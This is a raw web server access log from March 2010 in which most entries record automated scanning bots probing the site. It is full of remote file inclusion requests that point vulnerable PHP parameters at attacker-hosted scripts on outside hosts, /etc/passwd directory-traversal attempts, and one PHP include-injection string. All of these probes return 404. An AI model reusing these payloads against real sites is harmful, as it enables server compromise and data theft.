77.241.83.107 - - [03/Mar/2010:11:35:06 -0800] "GET /skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.152.137 - - [03/Mar/2010:11:35:37 -0800] "GET /logs/access_100204.log%20//login.php?dir=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [03/Mar/2010:11:35:37 -0800] "GET /logs//login.php?dir=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [03/Mar/2010:11:35:37 -0800] "GET /login.php?dir=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [03/Mar/2010:11:35:37 -0800] "GET /logs/access_100204.log%20//login.php?dir=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [03/Mar/2010:11:35:37 -0800] "GET /logs//login.php?dir=../../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [03/Mar/2010:11:35:38 -0800] "GET /login.php?dir=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:36:24 -0800] "GET /logs/access_100219.log//admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:36:24 -0800] "GET /admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:36:25 -0800] "GET /logs//admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:11:37:42 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:11:37:44 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:37:59 -0800] "GET /admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:38:00 -0800] "GET /logs/access_100219.log//admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:38:01 -0800] "GET /logs//admin/admin.php?vwar_root=index.php?loc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:38:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:38:33 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:38:33 -0800] "GET /skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:38:45 -0800] "GET /logs/access_100129.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:38:53 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:39:15 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:39:18 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:39:23 -0800] "GET /logs/access_100226.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:39:36 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:39:36 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:39:36 -0800] "GET /logs/access_100226.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:40:29 -0800] "GET /logs/access_100225.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:40:29 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:40:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:41:09 -0800] "GET /main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:41:38 -0800] "GET /logs/access_100225.log/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:41:49 -0800] "GET /logs//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:41:49 -0800] "GET /logs/access_100129.log%20%20//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:11:41:51 -0800] "GET /logs/access_100220.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:11:42:17 -0800] "GET /logs/access_100220.log%20%20//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:42:59 -0800] "GET /logs/access_100129.log%20%20///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:11:43:59 -0800] "GET /errors.php?error=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:11:43:59 -0800] "GET /errors.php?error=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:11:44:36 -0800] "GET /logs/access_100225.log/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [03/Mar/2010:11:44:49 -0800] "GET /logs/access_100130.log%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [03/Mar/2010:11:44:49 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [03/Mar/2010:11:44:49 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [03/Mar/2010:11:44:53 -0800] "GET /logs/access.log%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:45:53 -0800] "GET //appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:45:53 -0800] "GET /logs/access_100220.log%20%20///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:45:53 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [03/Mar/2010:11:45:57 -0800] "GET /logs/access_100130.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.128.80.14 - - [03/Mar/2010:11:45:57 -0800] "GET /logs/access.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [03/Mar/2010:11:47:06 -0800] "GET /logs/access_100210.log/errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.76.12.197 - - [03/Mar/2010:11:47:07 -0800] "GET /errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.76.12.197 - - [03/Mar/2010:11:47:07 -0800] "GET /logs/errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:49:19 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:49:19 -0800] "GET /gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:49:19 -0800] "GET /logs//gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:49:29 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:11:50:18 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:11:50:18 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:11:50:19 -0800] "GET /logs/access_100206.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:50:37 -0800] "GET /logs/access_100226.log///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:11:50:43 -0800] "GET /logs/access_100206.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:11:50:45 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:51:39 -0800] "GET /logs/access_100129.log///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [03/Mar/2010:11:52:10 -0800] "GET /logs/access_100201.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [03/Mar/2010:11:52:10 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [03/Mar/2010:11:52:10 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:11:55:15 -0800] "GET /logs/access_091224.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:11:55:48 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [03/Mar/2010:11:56:08 -0800] "GET /pictures/p8/ HTTP/1.0" 302 11303 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [03/Mar/2010:11:56:09 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.157.211.204 - - [03/Mar/2010:11:58:17 -0800] "GET /gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:58:17 -0800] "GET /logs//gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:58:17 -0800] "GET /logs/access_100217.log//gnuboard4/bbs/delete_all.php?board.skin.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:11:58:55 -0800] "GET /logs/access_100226.log///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:00:02 -0800] "GET /logs/access_100129.log///conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:00:45 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:12:01:37 -0800] "GET /errors.php?error=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:02:45 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:12:02:58 -0800] "GET /logs/access_100225.log/akocomments.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:05:57 -0800] "GET /logs/access_100226.log/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.145.149.162 - - [03/Mar/2010:12:06:53 -0800] "GET /logs/access_100210.log/errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.145.149.162 - - [03/Mar/2010:12:06:54 -0800] "GET /errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.145.149.162 - - [03/Mar/2010:12:06:55 -0800] "GET /logs/errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:07:23 -0800] "GET /logs/access_100226.log/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:12:08:49 -0800] "GET /logs/access_100126.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:12:08:49 -0800] "GET /logs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:12:08:52 -0800] "GET /skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:12:08:54 -0800] "GET /logs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:12:08:54 -0800] "GET /skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:12:08:54 -0800] "GET /logs/access_100126.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:09:49 -0800] "GET /logs/access_100129.log/home//conlib/local.php?cfg[path][contenido]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:12:10:40 -0800] "GET /logs/access_100221.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:12:10:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:12:10:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:12:10:54 -0800] "GET /logs/access_100126.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:12:13:45 -0800] "GET /admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:12:13:45 -0800] "GET /admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:15:02 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:15:05 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:15:05 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:15:06 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:15:11 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:15:56 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:16:03 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.107.158.100 - - [03/Mar/2010:12:16:08 -0800] "GET /logs/access_100210.log/errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
124.107.158.100 - - [03/Mar/2010:12:16:13 -0800] "GET /errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
124.107.158.100 - - [03/Mar/2010:12:16:18 -0800] "GET /logs/errors.php?error=http://cealianca.org.br/administrator/components/a?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:16:49 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:16:49 -0800] "GET /appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:16:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [03/Mar/2010:12:17:13 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://samava.com.au/css/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [03/Mar/2010:12:17:13 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://samava.com.au/css/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [03/Mar/2010:12:17:13 -0800] "GET /logs/access_100203.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://samava.com.au/css/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [03/Mar/2010:12:17:31 -0800] "GET /logs/access_100203.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://samava.com.au/css/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [03/Mar/2010:12:17:31 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://samava.com.au/css/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [03/Mar/2010:12:17:31 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://samava.com.au/css/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:17:43 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.226.79.22 - - [03/Mar/2010:12:17:49 -0800] "GET /mvcw.php?step=1&vwar_root=http://www.maakmuziek.nl/images/demo.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:12:17:50 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:17:52 -0800] "GET /appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
